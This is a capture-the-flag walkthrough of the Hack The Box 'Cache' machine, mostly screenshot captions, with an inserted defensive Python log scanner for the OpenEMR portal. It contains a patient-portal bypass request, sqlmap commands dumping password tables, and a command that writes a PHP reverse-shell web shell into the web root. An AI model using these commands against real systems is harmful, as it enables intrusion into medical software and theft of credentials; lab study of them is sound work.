Hack the Box: Cache



Nmap scan
Main site
login page
Credentials in js file
OpenEMR login page
OpenEMR version
An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to the registration page and modifying the requested URL to access the desired page.
# cat request 
GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=hr2livsbd5ai8c5cmglpme60fi; PHPSESSID=47et9rbfja72qos57se81ea8ha
Upgrade-Insecure-Requests: 1
# sqlmap -r request --tables -v0
| users_facility |
| users_secure |
# sqlmap -r request --dump -T users_secure
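Seen from the defender's side, the portal bypass and the injectable request above both leave traces in the web access log. The scanner below is an added example, not part of the original write-up; the Apache combined log format, the login and registration paths, and keying on client IP are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumptions (not from the write-up): the log format and these three paths.
PUBLIC = {"/portal/index.php", "/portal/account/register.php"}
LOGIN_POST = "/portal/get_patient_info.php"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*"')

def scan(lines):
    """Return (client, path, reason) tuples for suspicious portal requests."""
    seen_login, findings = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, method, target = m.groups()
        url = urlsplit(target)
        if not (url.path.startswith("/portal/") and url.path.endswith(".php")):
            continue
        if method == "POST" and url.path == LOGIN_POST:
            seen_login.add(client)  # coarse: any login attempt counts
            continue
        # The request above sends catid=1; flag values that are not plain digits.
        for value in parse_qs(url.query, keep_blank_values=True).get("catid", []):
            if not re.fullmatch(r"[0-9]+", value):
                findings.append((client, url.path, "non-numeric catid"))
        # Non-public portal page requested by a client that never sent a login.
        if url.path not in PUBLIC and client not in seen_login:
            findings.append((client, url.path, "portal page without login"))
    return findings

# Constructed sample log lines (not taken from the target host).
SAMPLE = [
    '10.0.0.5 - - [10/May/2020:10:00:00 +0000] "POST /portal/get_patient_info.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/May/2020:10:00:02 +0000] "GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/May/2020:10:05:00 +0000] "GET /portal/account/register.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/May/2020:10:05:03 +0000] "GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/May/2020:10:05:04 +0000] "GET /portal/find_appt_popup_user.php?catid=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding, sep="  ")
```

Clients behind a shared NAT or proxy collapse to one IP, so on a real deployment the session cookie is a better key if it is logged.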
password hash to openmr_admin
reversing the password
Admin interface
Listable /sites
echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'\"); ?>" > /var/www/hms.htb/public_html/sites/tellico.php
Reverse shell
User flag


Netstat result
Listing content of memcached
Reading luffy credentials
Move to luffy
Listing local docker images
Root flag


